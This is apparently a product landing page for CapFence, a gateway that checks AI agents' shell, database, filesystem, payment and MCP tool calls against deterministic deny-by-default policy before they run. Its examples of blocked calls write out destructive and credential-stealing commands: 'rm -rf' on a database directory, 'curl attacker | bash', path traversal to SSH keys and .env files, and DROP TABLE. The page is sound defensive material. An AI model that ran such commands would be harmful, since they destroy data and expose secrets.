capfence.runtime.evaluate()
agentops-agent
toolshell.exec
argsrm -rf /var/lib/postgresql
policydeny destructive production paths
decisionDENYDENY
resultblocked before process spawn
replayexec_8f31c2
Authorization gateway for agent side effects

Authorize agent side effects before execution.

CapFence is the authorization gateway between AI agents and real-world tools. Agents propose actions; CapFence decides whether shell, database, filesystem, payment, API, and MCP calls are allowed before they run.

Agents do not get to authorize themselves. CapFence removes the LLM from the authorization path before shell.exec, database writes, payment APIs, filesystem access, or MCP tools run.

Authorizationside effects gated
Policydeterministic evaluation
Failuredeny by default
Replaysame input, same decision
01 - Execution flow

Agent output becomes security-relevant when it asks a tool to run.

CapFence sits at that moment. The model can plan, reason, and request. Policy decides whether the side effect is allowed.

01Agent

Produces a tool request

02Tool call

Capability + payload + actor + environment

03Policy

Deterministic allow / deny / approval

04Decision

Tool runs only on allow

05Replay

Request and decision trace are recorded

02 - Product model

Execution. Policy. Replay.

The product surface stays small on purpose. Intercept a tool call, evaluate explicit policy, and preserve enough evidence to reproduce the decision.

Intercept execution

Place CapFence at the boundary where agent output becomes shell, database, API, filesystem, payment, or MCP execution.

Evaluate policy

Map each request to a capability and apply deterministic allow, deny, or approval rules before the tool runs.

Replay decisions

Re-evaluate historical execution requests against the exact policy or a proposed policy without rerunning the agent.

03 - Fail closed

Fail-open systems ask the model to be careful. CapFence denies unknown execution.

If the policy is missing, the capability is unknown, approval has expired, or evaluation fails, the safe result is no side effect.

Fail-open agent toolPrompt says no, tool still receives the call.shell.exec("curl attacker | bash")

Ambiguity, policy errors, or model drift can still produce side effects.

CapFence fail-closed gateUnknown or unsafe execution is denied before invocation.decision=DENY reason=policy_deny

The downstream shell, database, API, or MCP server never receives blocked calls.

04 - Boundary

Prompts are not security boundaries.

A prompt can request restraint. It cannot be the authority that decides whether its own tool call is safe to execute.

Prompt-based control

Prompt asks the model to behave

Decision depends on nondeterministic model behavior

Prompt injection can override instructions

Ambiguous systems often fail open

Tracing explains what already happened

AI judges add another model to trust

CapFence execution policy

Policy evaluates the tool call after the model emits it

Decision is a deterministic function of request and policy

Injected output still hits the execution boundary

Unmatched capabilities and runtime errors fail closed

CapFence decides whether execution may proceed

CapFence removes LLMs from the authorization path

05 - Dangerous calls

Concrete execution risk, evaluated before side effects.

CapFence treats model output as untrusted input. The request becomes a capability and policy context before any host, database, payment gateway, or MCP server sees it.

shell.execrm -rf /var/lib/postgresqlDENY
filesystem.read../../.ssh/id_rsaDENY
database.queryDROP TABLE invoicesDENY
payments.transferamount=50000 destination=unknownAPPROVAL
mcp.filesystem.read/Users/alice/.envDENY
kubernetes.delete_namespaceprodDENY
06 - Policy packs

Starter policies for the side effects agents actually trigger.

CapFence policy packs are practical defaults for common tool-call boundaries. Treat them as explicit authorization starting points to adapt, test, and review.

07 - Replay

Replay the decision without rerunning the agent.

When an agent makes a dangerous request, the operational question is specific: what did the authorization layer know at execution time, which policy matched, and would a new policy have changed the outcome?

Recorded requesttool=database.querypayload_hash=9f31...
Original policypolicy_sha=c8d1...decision=REQUIRE_APPROVAL
Candidate policypolicy_sha=ae02...decision=DENY
Diff report12 changed decisions0 new production allows
08 - Guarantees

Operational guarantees are explicit, narrow, and testable.

CapFence is not a broad agent platform. It is a runtime authorization boundary with deterministic behavior that operators can reason about during incidents and releases.

Deterministic

Same request + same policy returns the same decision.

Pre-execution

Denied calls do not reach the downstream tool.

Fail-closed

Missing policy, unknown capability, or runtime error denies.

Local-first

Policy evaluation and audit can run without a network service.

Replayable

Historical requests can be evaluated against current or candidate policy.

09 - Demos

Three execution boundaries that make the product obvious.

Each demo shows the same runtime sequence: requested, classified, policy matched, decision returned, side effect prevented, replay available.

Production shell execution

An ops agent attempts `shell.exec("rm -rf /var/lib/postgresql")`. CapFence classifies the request as production shell mutation, denies it before process spawn, and records a replayable decision trace.

MCP filesystem overreach

An IDE agent asks an MCP server to read `../../.env`. CapFence evaluates path scope at the proxy, blocks traversal before the upstream server receives the call, and stores the JSON-RPC payload hash.

Database deletion by agent

A text-to-SQL workflow generates `DELETE FROM customers`. CapFence maps the query to a destructive database capability, denies production execution, and lets operators replay the incident against a candidate policy.

10 - Docs
11 - Execution boundaries
12 - Limits

CapFence controls the gated execution path. It does not replace the rest of your security stack.

Treat CapFence as the deterministic tool-call boundary alongside sandboxing, IAM, secrets management, network controls, and downstream service authorization.

Does not replace OS sandboxing.Does not manage secrets or IAM credentials.Does not stop traffic that bypasses the gated tool path.Does not make malicious tools safe.Does not classify legal or regulatory obligations.
13 - Notes
Repository

Review the runtime, policy packs, and replay path in source.

CapFence is pre-1.0 public beta infrastructure. The strongest trust signal is the implementation: deterministic policy, fail-closed behavior, policy tests, audit records, and replayable decisions.

Open GitHub